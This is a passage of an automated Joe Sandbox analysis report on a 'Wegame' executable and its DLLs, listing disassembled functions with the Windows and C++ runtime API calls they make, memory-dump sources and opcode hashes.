                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Sleepselect
                                                                • String ID:
                                                                • API String ID: 3651608395-0
                                                                • Opcode ID: 72a074154a264ed16c2c722539272d9195c74f965bee8fbcc34bf9cdd9f1f484
                                                                • Instruction ID: 0f6e1b5df97d2151b47752c55e476a18c4c2e5f9dd352c395731c27146ed6346
                                                                • Opcode Fuzzy Hash: 72a074154a264ed16c2c722539272d9195c74f965bee8fbcc34bf9cdd9f1f484
                                                                • Instruction Fuzzy Hash: F1213372D1021CABDB5ADF64CC41BDA77BCAB19310F1042EEA51AE7180DA749B858FA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00458990 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 0045899A
                                                                  • Part of subcall function 0046E3BC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0040CD71,7FFFFFFE,?), ref: 0046E3D1
                                                                • _Open_dir.MSVCP140(?,?,?,?,?,?,?,00000000,Function_00066916,00000218), ref: 00458A16
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3_Open_dirmalloc
                                                                • String ID:
                                                                • API String ID: 1858716368-0
                                                                • Opcode ID: 85f884616bce4ebe86031cbda8994423dbf6eca5f0745fa4780e12dc9922f504
                                                                • Instruction ID: 34272dfa25cc1deba34e8948a9b68acb09edbcebffdc9aba1abc313db42300c6
                                                                • Opcode Fuzzy Hash: 85f884616bce4ebe86031cbda8994423dbf6eca5f0745fa4780e12dc9922f504
                                                                • Instruction Fuzzy Hash: 5321A2B5A00219DBCB21DF56C884ADEBBF8AF58304F10459FE545A7252EB388E44CF59
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD31E4A Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CountH_prolog3_Tick
                                                                • String ID:
                                                                • API String ID: 2349883465-0
                                                                • Opcode ID: f9f7efddc5464830e68d8e02bbb5fe97ad46d0ddb53cec40a527a6a0fcd1a466
                                                                • Instruction ID: 751414c0f30e4491a236d7a8fd20dca9856e62f1b655740baa23a7010d9dcfdd
                                                                • Opcode Fuzzy Hash: f9f7efddc5464830e68d8e02bbb5fe97ad46d0ddb53cec40a527a6a0fcd1a466
                                                                • Instruction Fuzzy Hash: 4121DF319002A8EBDB12DBB4C8057DDBFB1AF12328F14808CD4426F292CBBD5B49D761
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00467400 Relevance: 3.0, APIs: 2, Instructions: 42COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _Read_dir.MSVCP140(?,85A35C35,?), ref: 0046742E
                                                                • _Close_dir.MSVCP140(00000000), ref: 00467441
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Close_dirRead_dir
                                                                • String ID:
                                                                • API String ID: 543304316-0
                                                                • Opcode ID: 7d9aaaf1fc49238824c2f28b7ab74564462b23344240f5d129b73e338314b278
                                                                • Instruction ID: 89b263f86cd579325b0cf7a4e41011721d57bc1f01af2b5a3d3f018009b4d061
                                                                • Opcode Fuzzy Hash: 7d9aaaf1fc49238824c2f28b7ab74564462b23344240f5d129b73e338314b278
                                                                • Instruction Fuzzy Hash: 7101A231640118DFCB21DF59DC49AEAB7F9FF55308F1004DAE44597260EAB45E84CF5A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BDD435F Relevance: 3.0, APIs: 2, Instructions: 42COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _Read_dir.MSVCP140(?,1F5A0D44,?,?,6C09A4EC), ref: 6BDD438D
                                                                • _Close_dir.MSVCP140(00000000,?,?,6C09A4EC), ref: 6BDD43A0
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Close_dirRead_dir
                                                                • String ID:
                                                                • API String ID: 543304316-0
                                                                • Opcode ID: 7a36be5c4179aa801f20cc0451102b65abd17c50dec06ec9798904ac3c1ca887
                                                                • Instruction ID: fae2d3fb73fcb786892113471cadab451f87d4c555626ab49c6a5220d3f22cca
                                                                • Opcode Fuzzy Hash: 7a36be5c4179aa801f20cc0451102b65abd17c50dec06ec9798904ac3c1ca887
                                                                • Instruction Fuzzy Hash: 39018B31A40108DBCB21DF68D845A9AB7F8EF59314F1104AAE8849B260DBB49E84CF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD83D5C Relevance: 3.0, APIs: 2, Instructions: 35COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD83D63
                                                                  • Part of subcall function 6BD85ECA: InterlockedCompareExchange.KERNEL32(6C09F010,000000FF,00000000), ref: 6BD85EE0
                                                                  • Part of subcall function 6BD85ECA: memmove.VCRUNTIME140(?,6C09F000,00000010,6C09F000,?,6BD83D93,?,00000018,6BD83E28,?,00000010), ref: 6BD85EFD
                                                                  • Part of subcall function 6BD85ECA: InterlockedExchange.KERNEL32(6C09F010,00000001), ref: 6BD85F08
                                                                • memmove.VCRUNTIME140(?,?,00000010,?,00000018,6BD83E28,?,00000010), ref: 6BD83D9E
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ExchangeInterlockedmemmove$CompareH_prolog3_
                                                                • String ID:
                                                                • API String ID: 1558543935-0
                                                                • Opcode ID: cf22c58664fb52d1c2fa747754c6441415345feccd520adc8212eb4496b2dc3f
                                                                • Instruction ID: d7959da536abad96fd5a178869d996a5921e10d4b5eea28a9598f7b42fec077a
                                                                • Opcode Fuzzy Hash: cf22c58664fb52d1c2fa747754c6441415345feccd520adc8212eb4496b2dc3f
                                                                • Instruction Fuzzy Hash: C9F09631910518EBDF41DBB4CD429EDB375AF1821DF504554E6067F0A0D7399F05CBA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BDA8C15 Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,?,?,?,?,6BDA8BC5), ref: 6BDA8C26
                                                                • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,?,?,?,?,6BDA8BC5), ref: 6BDA8C3B
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: File$CreateMappingView
                                                                • String ID:
                                                                • API String ID: 3452162329-0
                                                                • Opcode ID: 0b7b54c5801e34ddb6da0f6c5019f1cb1e0dee7c68610158c66516395383b50f
                                                                • Instruction ID: 1f2c3881e9e48cd50037a0b9b234e3fa26b30bada22ebee9e9b91dfd600ea26a
                                                                • Opcode Fuzzy Hash: 0b7b54c5801e34ddb6da0f6c5019f1cb1e0dee7c68610158c66516395383b50f
                                                                • Instruction Fuzzy Hash: 54E09236205641ABDB341B269C0CE03BEE8DFC6721B10852DB569C20E0CA30C450CA20
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD3A628 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 6BD3A5BC: __EH_prolog3.LIBCMT ref: 6BD3A5C3
                                                                  • Part of subcall function 6BD3A5BC: ?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(00000008,?,?,00000008,6BD44945,00000008,?,?,00000000), ref: 6BD3A5D9
                                                                  • Part of subcall function 6BD3A5BC: ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(0000000F,00000000,00000001,?,?,?), ref: 6BD3A5F5
                                                                • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000002,00000000,00000000,6BD36B89,?,?,6BD3A68F,?,00000032,00000040,00000024,6BD38E76,?,?,?,00000004), ref: 6BD3A653
                                                                • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000000,00000000,00000000,6BD36B89,?,?,6BD3A68F,?,00000032,00000040,00000024,6BD38E76,?,?,?,00000004), ref: 6BD3A65D
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?getloc@?$basic_streambuf@?setstate@?$basic_ios@Fiopen@std@@H_prolog3U_iobuf@@Vlocale@2@
                                                                • String ID:
                                                                • API String ID: 736196837-0
                                                                • Opcode ID: da9a40299204dcfa29921128517ed9e03ed0aa596b3cfeb2c3b449c16dc997b1
                                                                • Instruction ID: f659a5efb94b1b13ea0b9db2de1f75611d3b9c7067c3cdd8f0c423e1392d1da5
                                                                • Opcode Fuzzy Hash: da9a40299204dcfa29921128517ed9e03ed0aa596b3cfeb2c3b449c16dc997b1
                                                                • Instruction Fuzzy Hash: C7E0D830340214EBDF149F54CC09F9ABF68EF05725F00400DFA094B291DB71E910CBA4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BDA8C50 Relevance: 3.0, APIs: 2, Instructions: 24fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • OpenFileMappingW.KERNEL32(00000006,00000000,?,?,6BDA8C01,?,6BDA8BAC), ref: 6BDA8C59
                                                                • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?,?,6BDA8C01,?,6BDA8BAC), ref: 6BDA8C72
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: File$MappingOpenView
                                                                • String ID:
                                                                • API String ID: 3439327939-0
                                                                • Opcode ID: 10b836a7d6d886d228fe162cd3f1da2d7e8dbc156d90655f0641889ae58e2bd2
                                                                • Instruction ID: df44bf220b086096832226cdd3b516d4c3796d96b93750af71356292e96c211a
                                                                • Opcode Fuzzy Hash: 10b836a7d6d886d228fe162cd3f1da2d7e8dbc156d90655f0641889ae58e2bd2
                                                                • Instruction Fuzzy Hash: 9BE0CD757817026FEB201B689C06F4277D49F04B11F20C46EB547DE5D0D7B0D8509B00
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 1001CF93 Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • HeapCreate.KERNEL32(00000000,00001000,00000000,1001B830,00000001), ref: 1001CFA4
                                                                  • Part of subcall function 1001D044: HeapAlloc.KERNEL32(00000000,00000140,1001CFB8), ref: 1001D051
                                                                • HeapDestroy.KERNEL32 ref: 1001CFC2
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338444411.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 00000003.00000002.3338431891.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338466811.0000000010028000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338481780.000000001002C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338495282.000000001002D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338508628.0000000010032000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_10000000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Heap$AllocCreateDestroy
                                                                • String ID:
                                                                • API String ID: 2236781399-0
                                                                • Opcode ID: d8a770daa41b8d60be9689a204a4aa1faff3ee016312721b53fcdfbe41eaabb8
                                                                • Instruction ID: 0198e4ef580578b03318088d43b22fbf82ce7638e1f78517e854e606bc678732
                                                                • Opcode Fuzzy Hash: d8a770daa41b8d60be9689a204a4aa1faff3ee016312721b53fcdfbe41eaabb8
                                                                • Instruction Fuzzy Hash: 55E012793153156EFB809B308D85F6936D5EF44BC2F114439FA04C80B4E770C582A600
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00456817 Relevance: 3.0, APIs: 2, Instructions: 18COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 0045681E
                                                                  • Part of subcall function 00453262: __EH_prolog3.LIBCMT ref: 00453269
                                                                  • Part of subcall function 00453202: __EH_prolog3.LIBCMT ref: 00453209
                                                                • _CxxThrowException.VCRUNTIME140(?,0049C288,?,00000054,?,0049C1AC,?,00000054,004568B0,00000000,?,?,00000030,00453EC0,00000000,int __thiscall boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_s), ref: 00456849
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3$ExceptionThrow
                                                                • String ID:
                                                                • API String ID: 2323905274-0
                                                                • Opcode ID: c26b882bbfff296d0daceb955bf3d49672022caa0dc76ce2a09c4786e1b1ef18
                                                                • Instruction ID: ccc2b6242ba1e52f3e4413ec4d5258a0b5932cfd3d647084ce22853b40a45d47
                                                                • Opcode Fuzzy Hash: c26b882bbfff296d0daceb955bf3d49672022caa0dc76ce2a09c4786e1b1ef18
                                                                • Instruction Fuzzy Hash: EFE0ECB1D5430DA6CF00BBE5CC4AEDD766CEF1030AF54845BB618A7042DA3C96088B59
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD44233 Relevance: 3.0, APIs: 2, Instructions: 18COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 6BD4423A
                                                                  • Part of subcall function 6BD42B15: __EH_prolog3.LIBCMT ref: 6BD42B1C
                                                                  • Part of subcall function 6BD42AB5: __EH_prolog3.LIBCMT ref: 6BD42ABC
                                                                • _CxxThrowException.VCRUNTIME140(?,6C044AE4,?,00000054,?,6C044B6C,?,000000B4,6BD442D6,00000000), ref: 6BD44265
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3$ExceptionThrow
                                                                • String ID:
                                                                • API String ID: 2323905274-0
                                                                • Opcode ID: 101d8e4698aea96da23c0d52f9a53112d5072e761cef67d5906ebb2ca5b3f383
                                                                • Instruction ID: eed09545babaf888606f4c677e56e11a5260f1a5a76f1c6aecd0e1f25524ef0f
                                                                • Opcode Fuzzy Hash: 101d8e4698aea96da23c0d52f9a53112d5072e761cef67d5906ebb2ca5b3f383
                                                                • Instruction Fuzzy Hash: 8FE0EC7282021CA7DF00EBF0CC4AEDE736D6B1428DF14442A6614EA050D7799A188760
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BE64AF0 Relevance: 3.0, APIs: 2, Instructions: 15synchronizationCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,6BE380C4,00000D24,6BE34ED9,6BE380C4,?,00000000,6BE38044,6BE396E3,?,00000000,6BE385FF,00000000,00000000,00000000), ref: 6BE64AFA
                                                                • FindCloseChangeNotification.KERNEL32(00000000,?,00000000,6BE38044,6BE396E3,?,00000000,6BE385FF,00000000,00000000,00000000,00000000,00000001,00000000,Closing connection %ld), ref: 6BE64B06
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ChangeCloseFindNotificationObjectSingleWait
                                                                • String ID:
                                                                • API String ID: 92520688-0
                                                                • Opcode ID: 0f137f47aaad36ab0d49078a6c0ed3d0b3ad6094cb0e328271bdf3f955e64dbb
                                                                • Instruction ID: 66f61adbb7e53e8f0f1b3cce647fdc0133892f3cc4ec07de326366a81a00288e
                                                                • Opcode Fuzzy Hash: 0f137f47aaad36ab0d49078a6c0ed3d0b3ad6094cb0e328271bdf3f955e64dbb
                                                                • Instruction Fuzzy Hash: 83D09E3A158122EBCB119F19D804A89BB79FF89731B214615F125921A4C7359426CB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD2737C Relevance: 3.0, APIs: 2, Instructions: 12COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 6BD27383
                                                                • ?get_first_mac@common@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.COMMON(?,?,?,?,?,00000004), ref: 6BD2738F
                                                                  • Part of subcall function 6BD874A3: __EH_prolog3_catch_GS.LIBCMT ref: 6BD874AD
                                                                Memory Dump Source
